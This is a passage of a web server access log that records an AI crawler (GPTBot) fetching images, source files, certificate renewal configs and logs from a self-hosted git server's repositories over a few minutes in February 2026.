(KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:06:24 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 6508436] [Gzip 12.00] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:06:32 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom3.png" [Client 74.7.227.38] [Length 7692347] [Gzip 11.87] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom3.png" -[17/Feb/2026:14:06:39 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 6429929] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:06:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 7641754] [Gzip 11.86] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:06:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom1.png" [Client 74.7.227.38] [Length 2082919] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom1.png" -[17/Feb/2026:14:06:47 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom5.png" [Client 74.7.227.38] [Length 1774975] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom5.png" -[17/Feb/2026:14:06:48 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom6.png" [Client 74.7.227.38] [Length 2102057] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom6.png" -[17/Feb/2026:14:06:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png" [Client 74.7.227.38] [Length 2483659] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/fd51c36120e0bc559f08a35a65c69351c564222a/html/assets/images/ControlRoom2.png" -[17/Feb/2026:14:06:49 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:14:06:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9896] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/services/geminiService.ts" -[17/Feb/2026:14:06:50 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Services.tsx" -[17/Feb/2026:14:06:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9897] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/services/geminiService.ts" -[17/Feb/2026:14:06:51 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Header.tsx" -[17/Feb/2026:14:06:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Footer.tsx" -[17/Feb/2026:14:06:52 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Hero.tsx" -[17/Feb/2026:14:06:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Header.tsx" -[17/Feb/2026:14:06:53 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/About.tsx" -[17/Feb/2026:14:06:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9881] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Footer.tsx" -[17/Feb/2026:14:06:54 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/assets/images" -[17/Feb/2026:14:06:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:14:06:55 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/Contact.tsx" -[17/Feb/2026:14:06:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9887] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Hero.tsx" -[17/Feb/2026:14:06:56 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/assets/images" -[17/Feb/2026:14:06:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 9890] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Services.tsx" -[17/Feb/2026:14:06:57 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Hero.tsx" [Client 74.7.227.38] [Length 9885] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Hero.tsx" -[17/Feb/2026:14:06:58 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 9889] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Services.tsx" -[17/Feb/2026:14:06:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 9882] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/Contact.tsx" -[17/Feb/2026:14:06:59 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/7e5f452449b5385fa46a3a589ed6aac00a02734a/.Backup/html/components/Footer.tsx" -[17/Feb/2026:14:07:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services/geminiService.ts" [Client 74.7.227.38] [Length 9896] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/services/geminiService.ts" -[17/Feb/2026:14:07:00 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/About.tsx" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/a0a212e41c7ebc2699ea736d71d145b9844673ec/.Backup/html/components/About.tsx" -[17/Feb/2026:14:07:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 9888] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:14:07:01 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commits/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images" [Client 74.7.227.38] [Length 9886] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/2681563c08aa04fbea2862fbca273762e67c16d6/.Backup/html/assets/images" -[17/Feb/2026:14:07:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/commit/fd51c36120e0bc559f08a35a65c69351c564222a?files=npm%2fdata%2flogs" [Client 74.7.227.38] [Length 52988] [Gzip 10.15] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/commits/commit/fd51c36120e0bc559f08a35a65c69351c564222a/npm/data/logs" -[17/Feb/2026:14:07:03 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/AssetPilot/commits/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/main.py" [Client 74.7.227.38] [Length 9923] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/AssetPilot/src/commit/1ba28dbce67b92a8a16ef4e5a21db13fbfa229fa/asset_pilot_docker/main.py" -[17/Feb/2026:14:07:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-1.conf" [Client 74.7.227.38] [Length 10938] [Gzip 3.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-1.conf" -[17/Feb/2026:14:07:04 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-4.conf" [Client 74.7.227.38] [Length 10937] [Gzip 3.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-4.conf" -[17/Feb/2026:14:07:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-7.conf" [Client 74.7.227.38] [Length 10891] [Gzip 3.91] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-7.conf" -[17/Feb/2026:14:07:05 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 27642] [Gzip 5.35] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs" -[17/Feb/2026:14:07:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-6.conf" [Client 74.7.227.38] [Length 10938] [Gzip 3.96] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/letsencrypt/renewal/npm-6.conf" -[17/Feb/2026:14:07:06 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html?display=rendered" [Client 74.7.227.38] [Length 14720] [Gzip 3.48] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/66e18d23c91cd4d290b6cecfdc88680af2fb97e2/html" -[17/Feb/2026:14:07:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/windpacer/commits/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor" [Client 74.7.227.38] [Length 10503] [Gzip 3.78] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/windpacer/src/commit/2cf19183736a8e544b69d3e5f8992d77b105f429/PostgresMonitor" -[17/Feb/2026:14:07:07 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/status.json" [Client 74.7.227.38] [Length 10021] [Gzip 2.85] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/status.json" -[17/Feb/2026:14:07:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/metadata.json" [Client 74.7.227.38] [Length 11297] [Gzip 3.04] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" -[17/Feb/2026:14:07:08 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/package.json" [Client 74.7.227.38] [Length 10980] [Gzip 4.29] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/package.json" -[17/Feb/2026:14:07:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/tsconfig.json" [Client 74.7.227.38] [Length 11882] [Gzip 3.44] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html" -[17/Feb/2026:14:07:09 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Footer.tsx" [Client 74.7.227.38] [Length 14325] [Gzip 7.12] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Footer.tsx" -[17/Feb/2026:14:07:10 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Header.tsx" [Client 74.7.227.38] [Length 14986] [Gzip 7.38] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Header.tsx" -[17/Feb/2026:14:07:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/ChatBot.tsx" [Client 74.7.227.38] [Length 15930] [Gzip 7.73] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/ChatBot.tsx" -[17/Feb/2026:14:07:11 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/raw/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 27720] [Gzip -] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log" -[17/Feb/2026:14:07:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log" [Client 74.7.227.38] [Length 32571] [Gzip 11.23] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/b288a964d15beae093be1af2456d67149d3aafa1/npm/data/logs/letsencrypt.log" -[17/Feb/2026:14:07:12 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/blame/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Contact.tsx" [Client 74.7.227.38] [Length 16937] [Gzip 8.76] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Contact.tsx" -[17/Feb/2026:14:07:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components/Services.tsx" [Client 74.7.227.38] [Length 14688] [Gzip 4.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" "https://git.hanmocnn.co.kr/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/components" -[17/Feb/2026:14:07:13 +0000] - 200 200 - GET https git.hanmocnn.co.kr "/windpacer/homepage/src/commit/998d733eb52423ffff2f8602efdfb1282198a61f/.Backup/html/assets/images" [Client 74.7.227.38] [Length 10194] [Gzip 3.25] [Sent-to 192.168.0.250] "Mozilla/5.0 AppleWebKit/537.36 (KHTML, like Gecko; compatible; GPTBot/1.3; +https://openai.com/gptbot)" 